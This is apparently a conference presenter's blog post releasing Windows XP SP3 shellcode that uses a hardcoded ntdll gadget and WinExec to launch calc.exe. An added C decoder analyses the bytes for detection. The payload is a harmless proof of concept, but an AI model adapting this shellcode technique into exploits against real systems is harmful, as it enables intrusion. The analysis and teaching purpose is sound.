Shellcode for Windows XP SP3 Professional SPA (DLLs version 5.1.2600.5512) / calc.exe

As a side product of my presentation at the NoConName 2012 conference last Saturday, I release here the code for a shellcode that launches the ‘calc.exe’ process. It has been tested on Windows XP SP3 Professional Edition (SPA), with kernel32.dll version 5.1.2600.5512 and ntdll.dll version 5.1.2600.5512; the addresses embedded in it are hardcoded for those exact DLL builds.

#include <stdio.h>

int main(int argc, char* argv[])
{
    /* Absolute address of a "push esp; ret" gadget inside ntdll.dll (5.1.2600.5512),
       used to transfer control to the stack where the shellcode lives. */
    char jmpNtdll[] = "\xB0\x9D\x92\x7C"; // push esp - ret (ntdll.dll)

    char shellcode[] =
        "\x31\xC9"             // xor ecx, ecx
        "\x51"                 // push ecx           ; NUL terminator for the string
        "\x68\x2E\x65\x78\x65" // push 0x6578652E    ; ".exe"
        "\x68\x63\x61\x6C\x63" // push 0x636C6163    ; "calc"  -> "calc.exe\0" on the stack
        "\x8B\xCC"             // mov ecx, esp       ; ecx = pointer to "calc.exe"
        "\x6A\x05"             // push SW_SHOW       ; uCmdShow = 5
        "\x51"                 // push ecx           ; lpCmdLine
        "\xBF\xAD\x23\x86\x7C" // mov edi, kernel32.WinExec (5.1.2600.5512)
        "\xFF\xD7"             // call edi           ; WinExec("calc.exe", SW_SHOW)
        "\xEB\xFE"             // jmp $EIP           ; spin forever instead of crashing
        ;

    /* Neither string contains a NUL byte, so printf emits both in full. */
    printf("%s%s\n", jmpNtdll, shellcode);
    return 0;
}
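When a stub like this shows up in a captured buffer or a crash dump, the questions an analyst has are: what string does it build on the stack, which absolute address does it call, and does it end in a spin loop? The following is an added example, not code from the original post. It is a small C helper that walks the bytes with a decoder that knows only the few x86 opcodes this kind of stub uses (so immediates are never mis-read as opcodes), reassembles the command line from the `push imm32` sequence in stack order, and pulls out the hardcoded `mov edi, imm32` target. The byte array `kShellcode`, the `struct analysis` type and the function names are all constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed copy of the shellcode bytes shown in the post (example data). */
static const unsigned char kShellcode[] = {
    0x31, 0xC9,                     /* xor ecx, ecx         */
    0x51,                           /* push ecx  (NUL)      */
    0x68, 0x2E, 0x65, 0x78, 0x65,   /* push ".exe"          */
    0x68, 0x63, 0x61, 0x6C, 0x63,   /* push "calc"          */
    0x8B, 0xCC,                     /* mov ecx, esp         */
    0x6A, 0x05,                     /* push 5  (SW_SHOW)    */
    0x51,                           /* push ecx             */
    0xBF, 0xAD, 0x23, 0x86, 0x7C,   /* mov edi, 7C8623ADh   */
    0xFF, 0xD7,                     /* call edi             */
    0xEB, 0xFE                      /* jmp $                */
};

struct analysis {
    char     cmdline[64];   /* string built on the stack by push imm32 */
    uint32_t call_target;   /* absolute address moved into edi and called */
    uint32_t cmdshow;       /* small immediate pushed as uCmdShow */
    int      self_loop;     /* 1 if a `jmp $` (EB FE) spin was seen */
    int      decoded_ok;    /* 0 if an opcode outside the tiny table was hit */
};

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode the stub with a table of the handful of opcodes it can contain.
   Returns 1 if every byte was consumed by a known instruction, 0 otherwise. */
int analyze_stub(const unsigned char *code, size_t len, struct analysis *a)
{
    uint32_t imms[8];
    size_t n_imm = 0, i = 0, pos = 0;
    memset(a, 0, sizeof *a);
    a->decoded_ok = 1;

    while (i < len) {
        unsigned char op = code[i];
        if (op == 0x68 && i + 5 <= len) {                      /* push imm32 */
            if (n_imm < 8) imms[n_imm++] = rd32(code + i + 1);
            i += 5;
        } else if (op == 0x6A && i + 2 <= len) {               /* push imm8 */
            a->cmdshow = code[i + 1];
            i += 2;
        } else if (op >= 0xB8 && op <= 0xBF && i + 5 <= len) { /* mov r32, imm32 */
            if (op == 0xBF) a->call_target = rd32(code + i + 1);
            i += 5;
        } else if (op == 0xEB && i + 2 <= len) {               /* jmp rel8 */
            if (code[i + 1] == 0xFE) a->self_loop = 1;
            i += 2;
        } else if (op >= 0x50 && op <= 0x57) {                 /* push r32 */
            i += 1;
        } else if ((op == 0x31 || op == 0x8B || op == 0xFF) && i + 2 <= len
                   && (code[i + 1] & 0xC0) == 0xC0) {          /* reg,reg ModRM forms only */
            i += 2;
        } else {
            a->decoded_ok = 0;                                 /* unknown opcode: stop */
            break;
        }
    }

    /* The stack grows down: the last push lands lowest in memory, i.e. first
       in the string, and each dword is stored little-endian. */
    for (size_t k = n_imm; k-- > 0 && pos + 4 < sizeof a->cmdline; ) {
        for (int b = 0; b < 4; b++) a->cmdline[pos++] = (char)(imms[k] >> (8 * b));
    }
    a->cmdline[pos] = '\0';
    return a->decoded_ok;
}

int main(void)
{
    struct analysis a;
    analyze_stub(kShellcode, sizeof kShellcode, &a);
    printf("cmdline     : \"%s\"\n", a.cmdline);
    printf("uCmdShow    : %u\n", a.cmdshow);
    printf("call target : 0x%08X (hardcoded, DLL-build specific)\n", a.call_target);
    printf("spin loop   : %s\n", a.self_loop ? "yes (EB FE)" : "no");
    return 0;
}
```

The two absolute addresses the decoder recovers are exactly what ties the stub to kernel32.dll/ntdll.dll 5.1.2600.5512: on any other build they point somewhere else and the stub fails, which is also why such fixed 4-byte constants make convenient detection signatures.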